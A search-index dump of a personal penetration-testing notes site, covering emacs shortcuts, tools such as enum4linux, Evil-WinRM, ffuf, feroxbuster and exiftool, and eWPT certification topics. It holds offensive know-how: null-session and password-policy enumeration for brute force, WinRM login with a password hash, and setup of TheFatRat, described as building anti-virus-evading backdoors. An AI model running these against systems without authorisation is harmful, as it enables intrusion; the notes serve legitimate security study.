                        # Go to previous line.\nC-p\n\n# Go to next line.\nC-n\n\n# Move cursor position one character forwards.\nC-f\n\n# Move cursos position one character backwards.\nC-b\n\n# Go to the beginning of the line.\nC-a\n\n# Go to the end of the line.\nC-e\n\n# Go to the beginning of the sentence.\nM-a\n\n# Go to the end of the sentence.\nM-e\n\n# Go to the beginning of the file.\nM-<\n\n# Go to the end of the file.\nM->\n
                        "},{"location":"emacs/#deleting","title":"Deleting","text":"
                        # Remove following word\nM-d\n\n# Remove previous word\nM-DEL\n\n# Remove from the cursor position to the end of the line\nC-k\n\n# Remove from the cursor position to the end of the sentence\nM-k\n\n# Select from here to the position where you've moved the cursor. \nC-Space\nDEL\n
                        "},{"location":"emacs/#clipboard","title":"Clipboard","text":"

                        Another cool functionality in emacs is that clipboard has history. If having a blank character at the end of the line wasn't not enough for just falling in love with emacs, now you cannot make excuses. The ability to navigate through the history of yanked code turns emacs into exactly what you have dreaming with.

                        # Browse the clipboard to older yanked text. \nM-y\n
                        "},{"location":"emacs/#undo","title":"Undo","text":"
                        # Three ways to undo an action text related (non cursor position related).\nC-/\nC-_\nC-x u\n
                        "},{"location":"emacs/#buffers","title":"Buffers","text":"

                        Also, browsing your buffers in emacs is insanely easy. One more reason to love emacs.

                        The emacs autosaved file has this syntax:

                        #nameOfAutosavedFile;\n
                        # List your buffers.\nC-b\n\n# Get rid of the list with all buffers.\nC-x 1\n\n# Go to an specific buffer (normally all of them are wrapped up between * *).\nC-x b <nameOfBuffer>\n\n# Enter in a minibuffer\nM-x\n\n# Get out of a minibuffer (in this case C-g doesn't work).\nESC ESC ESC\n
                        "},{"location":"emacs/#file-management","title":"File management","text":"
                        # Save in bulk. It will ask if you want to save your buffers one by one.\nC-x s\n\n# To recover a file:\n# Open the non saved file with\nemacs nameOfNonSavedFile\u00e7\nM-x recover-file RETURN\nYes ENTER\n
                        "},{"location":"emacs/#modes","title":"Modes","text":"
                        # Change to fundamental mode.\nM-x fundamental-mode\n\n# Change to text mode.\nM-x text-mode\n\n# Activate or deactivate autofill mode.\nM-x auto-fill-mode RETURN\n
                        "},{"location":"emacs/#search","title":"Search","text":"
                        # Search for an expression forwards.\nC-s\n\n# Search for an expression backwards.\nC-r\n
                        "},{"location":"emacs/#windows-management","title":"Windows management","text":"

                        Only a few things can compete with the beauty of i3 windows manager, and in my opinion emacs is not as neat and direct as i3, but still, emacs is not exactly a windows management tool but it manages its windows in a quite easy way:

                        # Divide vertically current window in two.\nC-x 2\n\n# Divide horizontally current window in two.\nC-x 3\n\n# Move cursor position to the other window.\nC-x o\n\n# Open a file in a different window below.\nC-x 4 C-f nameOfFile\n\n# Create a new and independent window.\nM-x make-frame\n\n# Remove/close the window.\nM-x delete-frame\n
                        "},{"location":"emacs/#help","title":"Help","text":"
                        # Show documentation about a command.\nC-h k command\n\n# Describe a command.\nC-h x command\n\n# Open available manuals.\nC-h i\n
                        "},{"location":"empire/","title":"Empire","text":"

                        Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.

                        Basically, you can run powershell agents without having to run powershell.

                        ","tags":["post exploitation"]},{"location":"empire/#installation","title":"Installation","text":"
                        git clone https://github.com/EmpireProject/Empire.git\nEmpire/setup/install.sh\n
                        ","tags":["post exploitation"]},{"location":"empire/#usage","title":"Usage","text":"","tags":["post exploitation"]},{"location":"enum/","title":"enum","text":"

                        Enum is a console-based Win32 information enumeration utility. Using null sessions, enum can retrieve userlists, machine lists, sharelists, namelists, group and member lists, password and LSA policy information. enum is also capable of a rudimentary brute force dictionary attack on individual accounts.\u00a0

                        ","tags":["windows","enumeration"]},{"location":"enum/#installation","title":"Installation","text":"

                        Download it from: https://packetstormsecurity.com/search/?q=win32+enum&s=files.

                        ","tags":["windows","enumeration"]},{"location":"enum/#basic-commands","title":"Basic commands","text":"
                        # Enumerates shares\nenum.exe -s $ip \u00a0 \u00a0 \n\n# Enumerates users\nenum.exe -u $ip\n\n# Displays the password policy in case you need to mount a network authentification attack\nenum.exe -p $ip \n
                        ","tags":["windows","enumeration"]},{"location":"enum4linux/","title":"enum4linux","text":"

                        enum4linux is used to exploit null session attacks by using this PERL script. The\u00a0original tool\u00a0was written in Perl and\u00a0rewritten by Mark Lowe in Python. Essentially it does something similar to winfo and enum.

                        ","tags":["windows","enumeration"]},{"location":"enum4linux/#installation","title":"Installation","text":"

                        Preinstalled in kali.

                        ","tags":["windows","enumeration"]},{"location":"enum4linux/#basic-commands","title":"Basic commands","text":"
                        # Enumerate shares\nenum4linux.exe -S $ip\n\n# Enumerate users\nenum4linux.exe -U $ip \u00a0 \u00a0 \n\n# Enumerate machine list\nenum4linux.exe -M $ip\n\n# Display the password policy in case you need to mount a network authentification attack\nenum4linux.exe -enuP $ip\n\n# Specify username to use (default \u201c\u201d)\nenum4linux.exe -u $ip\n\n# Specify password to use (default \u201c\u201d)\nenum4linux.exe -p $ip \u00a0 \u00a0 \n\n# Also you can use brute force by adding a file\nenum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip \u00a0\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux.exe -n $ip \u00a0\n# In the result we see the <20> flag which means there are resources shared\n\n# Enumerates the password policy in the remote system. This is useful to use brute force\nenum4linux.exe -P $ip\n\n# Enumerates available shares\nenum4linux.exe -s $ip     \n

                        If you want to run all these commands in one line:

                        enum4linux.exe -a $ip\n
                        ","tags":["windows","enumeration"]},{"location":"evil-winrm/","title":"Evil-WinRm","text":"

                        Evil-WinRM connects to a target using the Windows Remote Management service combined with the PowerShell Remoting Protocol to establish a PowerShell session with the target.

                        By default, installed on kali. See winrm.

                        ","tags":["tools","active directory","windows remote management"]},{"location":"evil-winrm/#basic-usage","title":"Basic usage","text":"

                        Example from HTB machine: Responder.

                        evil-winrm -i $ip -u <username -p <password>\n\nevil-winrm -i <ip> -u Administrator -H \"<passwordhash>\"\n# -H: Hash\n
                        ","tags":["tools","active directory","windows remote management"]},{"location":"ewpt-preparation/","title":"eWPT Preparation","text":"Module Course (name and link) My notes on HackingLife 01 Introduction to Web application testing -HTTP and HTTPs- Phases of a web application security testing 02 Web Enumeration & Information Gathering Information gathering 03 WAPT: Web proxies and Web Information Gathering - BurpSuite- OWASP Zap 04 XSS Attacks - Cross Site Script vulnerabilities.- XSSer 05 SQL Injection Attacks - SQL injection: mysql, mssql, postgreSQL, mariadb, oracle database - NoSQL injection: sqlite, mongodb, redis - SQLi Cheat sheet for manual injection - Burpsuite Labs 06 Testing for common attacks - Testing HTTP Methods- Attacking basic and digest authentication, and OTP- Session management- Session fixation- Session highjacking- CSRF- Command injections- RCE attack - Remote Code Execution 07 File and Resource attacks - Arbitrary File Upload- Directory Traversal attack- Local File Inclusion (LFI)- Remote File Inclusion (RFI) 08 Web Service Security testing - Web services 09 CMS Security testing - Pentesting wordpress 10 Encoding, Filtering & Evasion - Data encoding- Input filtering

                        eWPTX

                        Module Course name My notes on HackingLife 01 Encoding and filtering - Data encoding- Input filtering 02 Evasion Basics 03 Cross-Site Scripting - Cross Site Script vulnerabilities. 04 Filter evasion and WAF Bypasssing 05 Cross-Site Request Forgery 06 HTML 5 07 SQL Injection 08 SQLi - Filter Evasion and WAF Bypassing 09 XML Attacks 10 Attacking Serialization 11 Server Side Attacks 12 Attacking Crypto 13 Attacking Authentication & SSO 14 Pentesting APIs & Cloud Applications 15 Attacking LDAP-based Implementations","tags":["course","certification","web pentesting"]},{"location":"exiftool/","title":"exiftool - A tool for metadata edition","text":"

                        ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, Lyrics3, as well as the maker notes of many digital cameras by Canon, Casio, DJI, FLIR, FujiFilm, GE, GoPro, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Motorola, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

                        ExifTool can\u00a0Read,\u00a0Write and/or\u00a0Create files in the following formats. Also listed are the support levels for EXIF, IPTC (IIM), XMP, ICC_Profile, C2PA (JUMBF) and other metadata types for each file format. C2PA metadata is not currently\u00a0Writable, but may be\u00a0Deleted from some file types by deleting the JUMBF group (ie.\u00a0-JUMBF:all=).

                        ","tags":["pentesting","file"]},{"location":"exiftool/#installation","title":"Installation","text":"

                        Download from https://exiftool.org/index.html.

                        ","tags":["pentesting","file"]},{"location":"exiftool/#basic-usage","title":"Basic usage","text":"
                        # Print common meta information for all images in \"dir\".  \"-common\" is a shortcut tag representing common EXIF meta information.\nexiftool -common dir\n\n# List specified meta information in tab-delimited column form for all images in \"dir\" to an output text file named \"out.txt\".\nexiftool -T -createdate -aperture -shutterspeed -iso dir > out.txt\n\n# Print ImageSize and ExposureTime tag names and values.\nexiftool -s -ImageSize -ExposureTime b.jpg\n\n\n# Print standard Canon information from two image files.\nexiftool -l -canon c.jpg d.jpg\n\n# Recursively extract common meta information from files in \"pictures\" directory, writing text output to \".txt\" files with the same names.\nexiftool -r -w .txt -common pictures\n\n# Save thumbnail image from \"image.jpg\" to a file called \"thumbnail.jpg\".\nexiftool -b -ThumbnailImage image.jpg > thumbnail.jpg\n\n# Recursively extract JPG image from all Nikon NEF files in the current directory, adding \"_JFR.JPG\" for the name of the output JPG files.\nexiftool -b -JpgFromRaw -w _JFR.JPG -ext NEF -r .\n\n# Extract all types of preview images (ThumbnailImage, PreviewImage, JpgFromRaw, etc.) from files in directory \"dir\", adding the tag name to the output preview image file names.\nexiftool -a -b -W %d%f_%t%-c.%s -preview:all dir\n\n# Print formatted date/time for all JPG files in the current directory.\nexiftool -d '%r %a, %B %e, %Y' -DateTimeOriginal -S -s -ext jpg \n\n# Extract image resolution from EXIF IFD1 information (thumbnail image IFD)\nexiftool -IFD1:XResolution -IFD1:YResolution image.jpg\n\n# Extract all tags with names containing the word \"Resolution\" from an image.\nexiftool '-*resolution*' image.jpg\n\n# Extract all author-related XMP information from an image.\nexiftool -xmp:author:all -a image.jpg\n\n# Extract complete XMP data record intact from \"a.jpg\" and write it to \"out.xmp\" using the special \"XMP\" tag (see the Extra tags in Image::ExifTool::TagNames).\nexiftool -xmp -b a.jpg > out.xmp\n
                        ","tags":["pentesting","file"]},{"location":"exiftool/#tag-names","title":"Tag names","text":"

                        See table with all tag names: https://exiftool.org/TagNames/.

                        A\u00a0Tag Name\u00a0is the handle by which the information is accessed in ExifTool. Tag names are entered on the command line with a leading '-', in the order you want them displayed. Valid characters in a tag name are A-Z (case is not significant), 0-9, hyphen (-) and underline (_). The tag name may be prefixed by a\u00a0group name\u00a0(separated by a colon) to identify a specific information type or location. A special tag name of \"All\" may be used to represent all tags, or all tags in a specified group. For example:

                        ","tags":["pentesting","file"]},{"location":"exiftool/#tag-groups","title":"Tag groups","text":"

                        See all info related to Tag groups

                        ExifTool classifies tags into groups in various families. Here is a list of the group names in each family:

                        Family Group Names 0 (Information\u00a0Type) AAC, AFCP, AIFF, APE, APP0, APP1, APP11, APP12, APP13, APP14, APP15, APP2, APP3, APP4, APP5, APP6, APP7, APP8, APP9, ASF, Audible, Canon, CanonVRD, Composite, DICOM, DNG, DV, DjVu, Ducky, EXE, EXIF, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, GIF, GIMP, GeoTiff, GoPro, H264, HTML, ICC_Profile, ID3, IPTC, ISO, ITC, JFIF, JPEG, JSON, JUMBF, Jpeg2000, LNK, Leaf, Lytro, M2TS, MIE, MIFF, MISB, MNG, MOI, MPC, MPEG, MPF, MXF, MakerNotes, Matroska, Meta, Ogg, OpenEXR, Opus, PDF, PICT, PLIST, PNG, PSP, Palm, PanasonicRaw, Parrot, PhotoCD, PhotoMechanic, Photoshop, PostScript, PrintIM, QuickTime, RAF, RIFF, RSRC, RTF, Radiance, Rawzor, Real, Red, SVG, SigmaRaw, Sony, Stim, Theora, Torrent, Trailer, VCard, Vorbis, WTV, XML, XMP, ZIP 1\u00a0(Specific\u00a0Location) AAC, AC3, AFCP, AIFF, APE, ASF, AVI1, Adobe, AdobeCM, AdobeDNG, Apple, Audible, CBOR, CIFF, CameraIFD, Canon, CanonCustom, CanonDR4, CanonRaw, CanonVRD, Casio, Chapter#, Composite, DICOM, DJI, DNG, DV, DjVu, DjVu-Meta, Ducky, EPPIM, EXE, EXIF, ExifIFD, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, FujiFilm, FujiIFD, GE, GIF, GIMP, GPS, GSpherical, Garmin, GeoTiff, GlobParamIFD, GoPro, GraphConv, H264, HP, HTC, HTML, HTML-dc, HTML-ncc, HTML-office, HTML-prod, HTML-vw96, HTTP-equiv, ICC-chrm, ICC-clrt, ICC-header, ICC-meas, ICC-meta, ICC-view, ICC_Profile, ICC_Profile#, ID3, ID3v1, ID3v1_Enh, ID3v2_2, ID3v2_3, ID3v2_4, IFD0, IFD1, IPTC, IPTC#, ISO, ITC, InfiRay, Insta360, InteropIFD, ItemList, JFIF, JFXX, JPEG, JPEG-HDR, JPS, JSON, JUMBF, JVC, Jpeg2000, KDC_IFD, Keys, Kodak, KodakBordersIFD, KodakEffectsIFD, KodakIFD, KyoceraRaw, LNK, Leaf, LeafSubIFD, Leica, Lyrics3, Lytro, M-RAW, M2TS, MAC, MIE-Audio, MIE-Camera, MIE-Canon, MIE-Doc, MIE-Extender, MIE-Flash, MIE-GPS, MIE-Geo, MIE-Image, MIE-Lens, MIE-Main, MIE-MakerNotes, MIE-Meta, MIE-Orient, MIE-Preview, MIE-Thumbnail, MIE-UTM, MIE-Unknown, MIE-Video, MIFF, MISB, MNG, MOBI, MOI, MPC, MPEG, MPF0, MPImage, MS-DOC, MXF, MacOS, MakerNotes, MakerUnknown, Matroska, MediaJukebox, Meta, MetaIFD, Microsoft, Minolta, MinoltaRaw, Motorola, NITF, Nikon, NikonCapture, NikonCustom, NikonScan, NikonSettings, NineEdits, Nintendo, Ocad, Ogg, Olympus, OpenEXR, Opus, PDF, PICT, PNG, PNG-cICP, PNG-pHYs, PSP, Palm, Panasonic, PanasonicRaw, Parrot, Pentax, PhaseOne, PhotoCD, PhotoMechanic, Photoshop, PictureInfo, PostScript, PreviewIFD, PrintIM, ProfileIFD, Qualcomm, QuickTime, RAF, RAF2, RIFF, RMETA, RSRC, RTF, Radiance, Rawzor, Real, Real-CONT, Real-MDPR, Real-PROP, Real-RA3, Real-RA4, Real-RA5, Real-RJMD, Reconyx, Red, Ricoh, SPIFF, SR2, SR2DataIFD, SR2SubIFD, SRF#, SVG, Samsung, Sanyo, Scalado, Sigma, SigmaRaw, Sony, SonyIDC, Stim, SubIFD, System, Theora, Torrent, Track#, UserData, VCalendar, VCard, VNote, Version0, Vorbis, WTV, XML, XMP, XMP-DICOM, XMP-Device, XMP-GAudio, XMP-GCamera, XMP-GCreations, XMP-GDepth, XMP-GFocus, XMP-GImage, XMP-GPano, XMP-GSpherical, XMP-LImage, XMP-MP, XMP-MP1, XMP-PixelLive, XMP-aas, XMP-acdsee, XMP-album, XMP-apple-fi, XMP-ast, XMP-aux, XMP-cc, XMP-cell, XMP-crd, XMP-creatorAtom, XMP-crs, XMP-dc, XMP-dex, XMP-digiKam, XMP-drone-dji, XMP-dwc, XMP-et, XMP-exif, XMP-exifEX, XMP-expressionmedia, XMP-extensis, XMP-fpv, XMP-getty, XMP-hdr, XMP-hdrgm, XMP-ics, XMP-iptcCore, XMP-iptcExt, XMP-lr, XMP-mediapro, XMP-microsoft, XMP-mwg-coll, XMP-mwg-kw, XMP-mwg-rs, XMP-nine, XMP-panorama, XMP-pdf, XMP-pdfx, XMP-photomech, XMP-photoshop, XMP-plus, XMP-pmi, XMP-prism, XMP-prl, XMP-prm, XMP-pur, XMP-rdf, XMP-sdc, XMP-swf, XMP-tiff, XMP-x, XMP-xmp, XMP-xmpBJ, XMP-xmpDM, XMP-xmpDSA, XMP-xmpMM, XMP-xmpNote, XMP-xmpPLUS, XMP-xmpRights, XMP-xmpTPg, ZIP, iTunes 2\u00a0(Category) Audio, Author, Camera, Device, Document, ExifTool, Image, Location, Other, Preview, Printing, Time, Unknown, Video 3\u00a0(Document\u00a0Number) Doc#, Main 4\u00a0(Instance\u00a0Number) Copy# 5\u00a0(Metadata\u00a0Path) eg. JPEG-APP1-IFD0-ExifIFD 6\u00a0(EXIF/TIFF\u00a0Format) int8u, string, int16u, int32u, rational64u, int8s, undef, int16s, int32s, rational64s, float, double, ifd, unicode, complex, int64u, int64s, ifd64 7\u00a0(Tag\u00a0ID) ID-xxx (where xxx is the tag ID. Numerical ID's are given in hex with a leading \"0x\" if the\u00a0HexTagIDs API option\u00a0is set, as are characters in non-numerical ID's which are not valid in a group name. Note that unlike other group names, family 7 group names are case sensitive.) 8\u00a0(File\u00a0Number) File# (for files loaded via\u00a0-file_NUM_\u00a0option)

                        The exiftool output can be organized based on these groups using the\u00a0-g\u00a0or\u00a0-G\u00a0option (ie.\u00a0-g1\u00a0to see family 1 groups, or\u00a0-g3:1\u00a0to see both family 3 and family 1 group names in the output. See the\u00a0-g\u00a0option in the exiftool application documentation for more details, and the\u00a0GetGroup\u00a0function in the ExifTool library for a description of the group families. Note that when writing, only family 0, 1, 2 and 7 group names may be used.

                        ","tags":["pentesting","file"]},{"location":"eyewitness/","title":"EyeWitness","text":"

                        EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known. EyeWitness is designed to run on Kali Linux.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#installation","title":"Installation","text":"

                        Download from: https://github.com/FortyNorthSecurity/EyeWitness.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#basic-usage","title":"Basic usage","text":"

                        First, create a file with the target domains, like for instance, listOfdomains.txt.

                        Then, run:

                        eyewitness --web -f listOfdomains.txt -d path/to/save/\n

                        After that you will get a report.html file with the request and a screenshot of those domains. You will also have the source index.html code and the libraries in use.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#proxing-the-request-via-burpsuite","title":"Proxing the request via BurpSuite","text":"
                        eyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fatrat/","title":"FatRat","text":"

                        TheFatRat\u00a0is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android.\u00a0TheFatRat\u00a0Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

                        "},{"location":"fatrat/#installation","title":"Installation","text":"
                        git clone https://github.com/screetsec/TheFatRat.git\ncd TheFatRat\nchmod +x fatrat setup.sh\nsudo ./setup.sh\n
                        "},{"location":"fatrat/#basic-usage","title":"Basic usage","text":"
                        # After launching it, browse the menu that fatrat has\ncd TheFatRat\nsudo fatrat\n
                        "},{"location":"feroxbuster/","title":"feroxbuster - A web content enumeration tool for not referenced resources","text":"

                        feroxbuster is used to perform forced browsing. Forced browsing allows us to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

                        Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories.

                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#installation","title":"Installation","text":"

                        See the repo: https://github.com/epi052/feroxbuster.

                        sudo apt update && sudo apt install -y feroxbuster\n
                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#dictionaries","title":"Dictionaries","text":"

                        path to dictionary: /etc/feroxbuster/ferox-config.toml

                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#basic-commands","title":"Basic commands","text":"
                        # Include headers in the request\nferoxbuster -u http://127.1 -H Accept:application/json \"Authorization: Bearer {token}\"\n\n# Read urls from STDIN; pipe only resulting urls out to another tool\ncat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy traffic through Burp\nferoxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\n\n# Proxy traffic through a SOCKS proxy (including DNS lookups)\nferoxbuster -u http://127.1 --proxy socks5h://127.0.0.1:9050\n\n# Pass auth token via query parameter\nferoxbuster -u http://127.1 --query token=0123456789ABCDEF\n
                        ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"ffuf/","title":"ffuf - A fast web fuzzer written in Go","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#installation","title":"Installation","text":"

                        Download from: https://github.com/ffuf/ffuf

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#basic-commands","title":"Basic commands","text":"
                        ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n####### Matchers options #######\n# -mc: Match HTTP status codes, or \"all\" for everything. (default: 200,204,301,302,307,401,403,405)\n# -ml: Match amount of lines in response\n# -mr: Match regexp\n# -ms: Match HTTP response size\n# -mw: Match amount of words in response\n\n####### Filters options #######\n# -fc: Filter HTTP status codes from response. Comma separated list of codes and ranges\n# -fl: Filter by amount of lines in response. Comma separated list of line counts and ranges\n# -fr: Filter regexp\n# -fs: Filter HTTP response size. Comma separated list of sizes and ranges\n# -fw: Filter by amount of words in response. Comma separated list of word counts and ranges\n\n# Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\nffuf -w /path/to/vhost/wordlist -u https://$ip -H \"Host: FUZZ\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.example.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n

                        By pressing ENTER during ffuf execution, the process is paused and user is dropped to a shell-like interactive mode: in this mode, filters can be reconfigured, queue managed and the current state saved to disk.

                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fierce/","title":"fierce - DNS scanner that helps locate non-contiguous IP space and hostnames","text":"

                        Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a pre-cursor to nmap, OpenVAS, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network. Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware. Originally written by RSnake along with others at http://ha.ckers.org/.

                        # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n\n# Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"figlet/","title":"Figlet","text":"","tags":["tools"]},{"location":"figlet/#installation","title":"Installation","text":"
                        sudo apt install figlet\n
                        ","tags":["tools"]},{"location":"figlet/#basic-commands","title":"Basic commands","text":"
                        # Show all fonts\nshowfigfonts\n\n# Usage\nfiglet -f banner \"lalala\"\n# -f font\n# banner is just a font\n# \"lalala\" the text that will be displayed\n\n\n#                                          \n#         ##   #        ##   #        ##   \n#        #  #  #       #  #  #       #  #  \n#       #    # #      #    # #      #    # \n#       ###### #      ###### #      ###### \n#       #    # #      #    # #      #    # \n####### #    # ###### #    # ###### #    # \n
                        ","tags":["tools"]},{"location":"file-encryption/","title":"File encryption","text":"

                        title: File Encryption: windows and linux author: amandaguglieri draft: false TableOfContents: true tags: - file encryption - windows - linux

                        "},{"location":"file-encryption/#file-encryption","title":"File Encryption","text":""},{"location":"file-encryption/#windows","title":"Windows","text":""},{"location":"file-encryption/#invoke-aesencryptionps1-powershell-script","title":"Invoke-AESEncryption.ps1 PowerShell script","text":"

                        Invoke-AESEncryption.ps1 PowerShell script

                        After the script has been transferred, it only needs to be imported as a module, as shown below.

                        PS C:\\htb> Import-Module .\\Invoke-AESEncryption.ps1\n

                        This command creates an encrypted file with the same name as the encrypted file but with the extension \".aes.\" Cheat sheet for encrypting and decrypting files:

                        ############\n# ENCRYPTION\n############\n# Encrypts the string \"Secret Test\" and outputs a Base64 encoded ciphertext\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Text \"Secret Text\" \n\n# Encrypts the file \"file.bin\" and outputs an encrypted file \"file.bin.aes\"\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Path file.bin\n\n# Decrypts the file \"file.bin\" and outputs an encrypted file \"file.bin.aes\"\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Path file.bin.aes\n
                        ############\n# DECRYPTION\n############\n# Decrypts the Base64 encoded string \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\" and outputs plain text.\nInvoke-AESEncryption -Mode Decrypt -Key \"p@ssw0rd\" -Text \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\"\n
                        "},{"location":"file-encryption/#linux","title":"Linux","text":"

                        See openssl

                        # Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iterations counts with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: Specify the entry parameter\n\n# Decrypt a dile with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
                        "},{"location":"footprinting/","title":"01. Information Gathering / Footprinting","text":"","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#methodology","title":"Methodology","text":"Layer Description Information Categories 1. Internet Presence Identification of internet presence and externally accessible infrastructure. Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures 2. Gateway Identify the possible security measures to protect the company's external and internal infrastructure. Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare 3. Accessible Services Identify accessible interfaces and services that are hosted externally or internally. Service Type, Functionality, Configuration, Port, Version, Interface 4. Processes Identify the internal processes, sources, and destinations associated with the services. PID, Processed Data, Tasks, Source, Destination 5. Privileges Identification of the internal permissions and privileges to the accessible services. Groups, Users, Permissions, Restrictions, Environment 6. OS Setup Identification of the internal components and systems setup. OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#owasp-reference","title":"OWASP reference","text":"ID WSTG-ID Test Name Objectives Tools 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). Google Hacking Shodan Recon-ng 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. Wappalyzer Nikto 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. Browser Curl Burpsuite/ZAP 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers dnsrecon Nmap 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. Browser Curl Burpsuite/ZAP 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis OWASP ASD Burpsuite/ZAP 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough Burpsuite/ZAP 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. Whatweb Wappalyzer CMSMap 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 NA 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs Network and Security: Reverse proxy, IPS, WAF WAFW00F Nmap","tags":["footprinting","CPTS","eWPT"]},{"location":"fping/","title":"fping - An improved ping tool","text":"

                        Linux tool which is an improved version of the ping utility:

